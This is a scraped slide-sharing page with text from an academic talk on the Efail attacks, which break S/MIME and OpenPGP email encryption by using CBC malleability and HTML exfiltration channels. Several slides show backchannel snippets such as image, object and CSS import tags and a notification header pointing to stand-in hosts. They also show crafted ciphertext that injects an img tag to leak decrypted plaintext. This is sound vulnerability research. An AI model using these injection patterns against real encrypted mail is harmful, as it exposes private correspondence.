efail attack and it its im implications
play

Efail attack and it its im implications Juraj Somorovsky Damian - PowerPoint PPT Presentation

Jan 17, 2023 •283 likes •1.23k views

Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jrg Schwenk 2 About this talk Efail:

  1. Efail attack and it its im implications Juraj Somorovsky Damian Poddebniak 1 , Christian Dresen 1 , Jens Müller 2 , Fabian Ising 1 , Sebastian Schinzel 1 , Simon Friedberger 3 , Juraj Somorovsky 2 , Jörg Schwenk 2

  2. About this talk • Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels. Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 • Johnny, you are fired! Spoofing OpenPGP and S/MIME Signatures in Email . Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2019

  3. Email. 3

  4. Internet Message Format („Email“) From: Alice To: Bob Subject: Breaking News Congratulations, you have been promoted! 4

  5. Multipurpose Internet Mail Extensions (MIME) From: Alice To: Bob Subject: Breaking News Content-Type: text/plain Congratulations, you have been promoted! 5

  6. Multipurpose Internet Mail Extensions (MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/mixed; boundary="BOUNDARY" --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-type: application/pdf Contract... --BOUNDARY-- 6

  7. av2.com av1.com smtp.corp2 smtp.corp1 imap.corp2 imap.corp1 archive.corp1 archive.corp2

  8. av1.com smtp.corp1 imap.corp1 archive.corp1

  9. There is no such thing as “My Email”. 10

  10. av1.com Assumption: smtp.corp1 imap.corp1 Attacker has archive.corp1 access to emails!

  11. Motivation for using end-to-end encryption Insecure Transport • TLS might be used – we don’t know ! Nation state attackers (see also lecture given by Tibor) • Massive collection of emails • Snowden’s global surveillance disclosure Breach of email provider / email account • Single point of failure • Aren’t they reading/analyzing my emails anyway? 12

  12. Two competing standards OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies 13

  13. Signed Email (S/MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed ; boundary="BOUNDARY“; protocol="application/pkcs7- signature“ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA== --BOUNDARY-- 14

  14. Signed Email (S/MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed ; boundary="BOUNDARY“; protocol="application/pkcs7- signature“ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA== --BOUNDARY-- 15

  15. Signed Email (S/MIME) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed ; boundary="BOUNDARY“; protocol="application/pkcs7- signature“ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA== --BOUNDARY-- 16

  16. Signed Email (PGP) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed; boundary="BOUNDARY"; protocol="application/pgp-signature “ --BOUNDARY Content-type: text/plain Congratulations, you have been promoted! --BOUNDARY Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- iQE /BAEBAgApBQJbW1tqIhxCcnVjZSBXYXluZSA8YnJ1Y2V3YX… -----END PGP SIGNATURE----- --BOUNDARY-- 17

  17. Encrypted Email (PGP) From: Alice To: Bob Subject: Breaking News Content-Type: multipart/encrypted; boundary="BOUNDARY"; protocol="application/pgp-encrypted"; --BOUNDARY Content-Type: application/octet-stream; name="encrypted.asc" Content-Description: OpenPGP encrypted message Content-Disposition: inline; filename="encrypted.asc" -----BEGIN PGP MESSAGE----- hQIMA0Zy9l4Cw+FaAQ//YewiWjMoX2BebbwJQJMJxvHRoF30NjkZe88m9kGts/tn DgkUPQEgJJJq /K1TwyAvR8tSLq… -----END PGP MESSAGE----- --BOUNDARY-- 18

  18. New published PGP public keys per month ? Known limitations!  Usability  Snowden Effekt  Enigmail  New keys at keyserver  Hard for S/MIME  Opsec von Snowden und thegruq  Ver- und Entschlüsselung nur in separater Anwendung! 19

  19. PGP and OpSec  Some tutorials recommend using PGP outside of email client. • https://gist.github.com/grugq/03167bed45e774 551155 • https://vimeo.com/56881481  Others recommended Enigmail in default settings (i.e. HTML switched on) 20

  20. 21

  21. Ok, so how about the security? ‘99 ‘06 ‘15 22

  22. Overview 1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions 23

  23. 2014: Enigmail won’t encrypt. https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/ 24

  24. 2017: Outlook includes plaintext in encrypted email. https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/ 25

  25. 2018: Enigmail/PEP won‘t encrypt. https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html 26

  26. Both standards use old crypto Both standards use old crypto Ciphertext C = Enc(M) C 1 valid/invalid C 2 valid/invalid … (repeated several times) M = Dec(C) 27

  27. Old crypto has no negative impact CBC / CFB modes of operation used, but their usage is not exploitable Old crypto has no negative impact Assumption: Email is non-interactive 29

  28. Backchannel • Any functionality that forces the email client to interact with the network <img src="http://efail.de"> <object data="ftp://efail.de"> • HTML/CSS <style>@import '//efail.de'</style> • JavaScript XSS cheat sheets Disposition-Notification-To: eve@evil.com ... Remote-Attachment-URL: http://efail.de • Email header X-Image-URL: http://efail.de • Attachment preview PDF, SVG, VCards, etc. … OCSP, CRL, intermediate certs • Certificate verification 30

  29. Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail KMail Claws Thunderbird Linux Evolution Trojitá Mutt Airmail MailMate Apple Mail Backchannels macOS found Mail App Outlook CanaryMail iOS K-9 Mail MailDroid Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail iCloud HushMail FastMail Mailfence ZoHo Mail Outlook.com Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile leak by default leak via bypass script execution ask user 31

  30. Attacker model 32

  31. Attacker model 33

  32. Overview 1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions 34

  33. S/MIME uses CBC Source: wikipedia • Cipher Block Chaining mode of operation • Not authenticated • Vulnerable to many attacks (TLS, XML Encryption, SSH) • Basic problem: malleability

  34. Malleability of CBC C 1 C 2 C 0 decryption decryption P 0 P 1 36

  35. Malleability of CBC C 1 C 2 C 0 ' decryption decryption Content-type: te xt/html\nDear Bob P 0 ' P 1 37

  36. Malleability of CBC C 1 C 2 C 0 ' decryption decryption Z ontent-type: te xt/html\nDear Bob P 0 ' P 1 38

  37. Malleability of CBC C 0 ⊕ P 0 C 1 C 2 decryption decryption 0000000000000000 xt/html\nDear Bob P 0 ' P 1 CBC Gadget 39

  38. Malleability of CBC C 0 ⊕ P 0 ⊕ P c C 1 C 2 decryption decryption <img src =” ev.il/ xt/html\nDear Bob P 0 ' P 1 40

  39. Malleability of CBC C 1 ' C 2 C 0 decryption decryption Content-type: te Z t/html\nDear Bob P 0 ' P 1 ' 41

  40. Malleability of CBC C 1 ' C 2 C 0 decryption decryption ???????????????? Z t/html\nDear Bob P 0 ' P 1 ' 42

  41. Practical Attack against S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <img " " src="efail.de/ ???????????????? ???????????????? Content-type: te xt/html\nDear Sir or Madam, the se "> ???????????????? 43

  42. Practical Attack against S/MIME 44

  43. Demo

  44. Overview 1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions 46

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de |

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de |

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS mail@efail.de | https://www.efail.de 1 Mnster University of Applied Sciences Damian Poddebniak 1 , Christian Dresen 1 , Jens Mller 2 , Fabian Ising 1 , 2 Ruhr

675 views • 41 slides
Attack on Traffic Systems These attack examples have happened in the past. We will take an

Attack on Traffic Systems These attack examples have happened in the past. We will take an

From start to finish how a cyber attack would be performed on traffic system, we will go over first day &gt;&gt; exploitation of the device &gt;&gt; the real-world aftermath. Mission Secure, Inc. Attack on Traffic Systems These attack examples

556 views • 18 slides
Attack on Sony 2014 Sammy Lui 1 In Index Overview Timeline Tools Wiper

Attack on Sony 2014 Sammy Lui 1 In Index Overview Timeline Tools Wiper

Attack on Sony 2014 Sammy Lui 1 In Index Overview Timeline Tools Wiper Malware Implications Need for physical security Employees Accomplices? Dangers of Cyberterrorism Danger to Other

352 views • 23 slides
ATTACK: Learning the Distributions of Adversarial Examples for an Improved Black-Box Attack on

ATTACK: Learning the Distributions of Adversarial Examples for an Improved Black-Box Attack on

ATTACK: Learning the Distributions of Adversarial Examples for an Improved Black-Box Attack on Deep Neural Networks Yandong Li* 1 Lijun Li* 1 Liqiang Wang 1 Tong Zhang 2 Boqing Gong 3 *Equal Contribution 1 University of Central Florida 2 Hong

440 views • 11 slides
Detecting a Biological Attack The attack will not be obvious; it may take hours or days to know.

Detecting a Biological Attack The attack will not be obvious; it may take hours or days to know.

Detecting a Biological Attack The attack will not be obvious; it may take hours or days to know. Current biological diagnostics are very effective at identifying agents, but theyre slow. We already have an infrastruc- ture in place to

233 views • 8 slides
ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT &amp; Return-to-plt Attack

ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT &amp; Return-to-plt Attack

ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT &amp; Return-to-plt Attack &amp; GOT Overwrite Attack Dr. Si Chen (schen@wcupa.edu) Review Page 2 ret2libc Attack Page 3 libc C standard library Provides

662 views • 36 slides
.tr DDoS Attack December 2015 Attila zgit .tr ccTLD Manager Dec, 2015 .tr DDoS Attack A

.tr DDoS Attack December 2015 Attila zgit .tr ccTLD Manager Dec, 2015 .tr DDoS Attack A

.tr DDoS Attack December 2015 Attila zgit .tr ccTLD Manager Dec, 2015 .tr DDoS Attack A Summary of a 3 weeks long experience 2016-03-07 Dec 2015 DDoS Attack on .TR 2 Before DDoS q Infrequent Small scale DoS and DDos Attacks Few

606 views • 14 slides
GN3 view on multi-d domain services and its implications on NOC implications on NOC Cs Cs Ann

GN3 view on multi-d domain services and its implications on NOC implications on NOC Cs Cs Ann

GN3 view on multi-d domain services and its implications on NOC implications on NOC Cs Cs Ann Harding (SWITCH) TF-NOC preparation me eeting Copenhagen, Denmark, 3.5.2010 connect communicate collaborate Agenda Starting point for

355 views • 16 slides
A New Side-Channel Attack on RSA Prime Generation Thomas Finke, Max Gebhardt, Werner Schindler

A New Side-Channel Attack on RSA Prime Generation Thomas Finke, Max Gebhardt, Werner Schindler

A New Side-Channel Attack on RSA Prime Generation Thomas Finke, Max Gebhardt, Werner Schindler Federal Office for Information Security (BSI), Germany Lausanne, September 7, 2009 Outline r Introduction and Motivation r The Attack r Basic attack

514 views • 25 slides
Cryptanalysis of PRINT CIPHER : The Invariant Subspace Attack Gregor Leander, Mohamed

Cryptanalysis of PRINT CIPHER : The Invariant Subspace Attack Gregor Leander, Mohamed

Description of PRINT CIPHER The Attack Relation To Truncated Differential Attack Conclusion Cryptanalysis of PRINT CIPHER : The Invariant Subspace Attack Gregor Leander, Mohamed Abdelraheem, Huda AlKhzaimi, and Erik Zenner DTU Mathematics

598 views • 37 slides
Ransomware Attack Briefing Presidents Leadership Council October 21, 2019 August 8 Cyberattack

Ransomware Attack Briefing Presidents Leadership Council October 21, 2019 August 8 Cyberattack

Ransomware Attack Briefing Presidents Leadership Council October 21, 2019 August 8 Cyberattack Summary : The attack was severe and sophisticated; categorized as a catastrophic attack. It was highly strategic with regard to timing

329 views • 16 slides
TCPDB.DAT case Archive file signatures Attack surface Attack vectors Defense Conclusions P A

TCPDB.DAT case Archive file signatures Attack surface Attack vectors Defense Conclusions P A

Introduction Motivation SAP compression algorithms Archive file programs SAP archive file formats CAR SAR v2.00 SAR v2.01 Relative/absolute paths TCPDB.DAT case Archive file signatures Attack surface Attack vectors

913 views • 49 slides
ASCs 5.1 Surround ATTACK Wall walls and corners. Its name, ATTACK is an acronym that

ASCs 5.1 Surround ATTACK Wall walls and corners. Its name, ATTACK is an acronym that

December 7-8, 2001, Beverly Hills, CA. Corporation, at the Surround 2001 International Conference and Technology Showcase, .E., President of Acoustic Sciences Transcript of a seminar presented by Arthur Noxon P ASCs 5.1 Surround ATTACK Wall

243 views • 6 slides
Identifying Attack Vectors Professor Larry Heimann Web Application Security Information Systems

Identifying Attack Vectors Professor Larry Heimann Web Application Security Information Systems

Identifying Attack Vectors Professor Larry Heimann Web Application Security Information Systems Nothing is in isolation Attack surface An attack surface is the total number of possible attack vectors Think of a house, with the

309 views • 15 slides
Attack Class: Address Spoofing L. Todd Heberlein 23 Oct 1996 Net Squared Inc. todd@NetSQ.com

Attack Class: Address Spoofing L. Todd Heberlein 23 Oct 1996 Net Squared Inc. todd@NetSQ.com

Attack Class: Address Spoofing L. Todd Heberlein 23 Oct 1996 Net Squared Inc. todd@NetSQ.com Overview of Talk l Introduction l Background material l Attack class l Example attack l Popular questions l Extensions UCD Vulnerabilities Group l

759 views • 24 slides
Recent Attack Technologies Neil Long OxCert Introduction Hope for audience participation!

Recent Attack Technologies Neil Long OxCert Introduction Hope for audience participation!

Recent Attack Technologies Neil Long OxCert Introduction Hope for audience participation! At least two aspects Target payloads Attack origins Future? arenas Attack Payloads Buffer overflow Format strings

535 views • 18 slides
Johnny Miller - DTS ThM - 1970 ThD - 1980 former president of Columbia Intntl U. John

Johnny Miller - DTS ThM - 1970 ThD - 1980 former president of Columbia Intntl U. John

Johnny Miller - DTS ThM - 1970 ThD - 1980 former president of Columbia Intntl U. John Soden - DTS ThM - 1983 PHD - 1989 MILLER Background Raised in fundamentalist, Bible teaching church Inspiration &amp; inerrancy H Morris

715 views • 15 slides
Arrays Lecture 9 COP 3014 Fall 2019 October 15, 2019 Array Definition An array is an indexed

Arrays Lecture 9 COP 3014 Fall 2019 October 15, 2019 Array Definition An array is an indexed

Arrays Lecture 9 COP 3014 Fall 2019 October 15, 2019 Array Definition An array is an indexed collection of data elements of the same type. Indexed means that the array elements are numbered (starting at 0). The restriction of the same

450 views • 11 slides
What Does It Mean to Draft Perfectly in the NHL? When is Best Player Available not the Best

What Does It Mean to Draft Perfectly in the NHL? When is Best Player Available not the Best

What Does It Mean to Draft Perfectly in the NHL? When is Best Player Available not the Best Strategy? Namita Nandakumar Wharton School, University of Pennsylvania @nnstats Vancouver Hockey Analytics Conference 2017 Lets define the status

574 views • 20 slides
A Class y Spider W E B SC R AP IN G IN P YTH ON Thomas Laetsch Data Scientist , NYU Yo u r

A Class y Spider W E B SC R AP IN G IN P YTH ON Thomas Laetsch Data Scientist , NYU Yo u r

A Class y Spider W E B SC R AP IN G IN P YTH ON Thomas Laetsch Data Scientist , NYU Yo u r Spider import scrapy from scrapy.crawler import CrawlerProcess class SpiderClassName(scrapy.Spider): name = &quot;spider_name&quot; # the code for

454 views • 28 slides
EIT ICT Labs Summer School on Cloud and Big Data - The Mentimeter Case Johnny Warstrm, CEO

EIT ICT Labs Summer School on Cloud and Big Data - The Mentimeter Case Johnny Warstrm, CEO

EIT ICT Labs Summer School on Cloud and Big Data - The Mentimeter Case Johnny Warstrm, CEO &amp; Co-founder Mentimeter - Awkward family photo Summary of Mentimeter Why we do it: We want to give everyone a chance to share their opinion How we

651 views • 7 slides
more competitive era, and to replenish our vision, reinvigorate our diplomacy, revive our

more competitive era, and to replenish our vision, reinvigorate our diplomacy, revive our

An opportunity remains to take hold of the moment before us, to face squarely the new challenges of this more competitive era, and to replenish our vision, reinvigorate our diplomacy, revive our partnerships, and to restore American

483 views • 17 slides
Baumgartner, POLI 203 Fall 2014 NC DP History Reading: UNC Wilson Library Collection on-line

Baumgartner, POLI 203 Fall 2014 NC DP History Reading: UNC Wilson Library Collection on-line

Baumgartner, POLI 203 Fall 2014 NC DP History Reading: UNC Wilson Library Collection on-line October 13, 2014 Catching Up, Greg Taylor Interesting or troubling elements of this case: Police tunnel vision Suspects in custody, case

279 views • 7 slides
Agenda Announcements Overview Course Topics Range function List BMI 1/14/2013

Agenda Announcements Overview Course Topics Range function List BMI 1/14/2013

Agenda Announcements Overview Course Topics Range function List BMI 1/14/2013 CompSci101 Peter Lorensen 1 Course topics Variables Types and values String Function For loop If While loop Lists

388 views • 9 slides

More recommend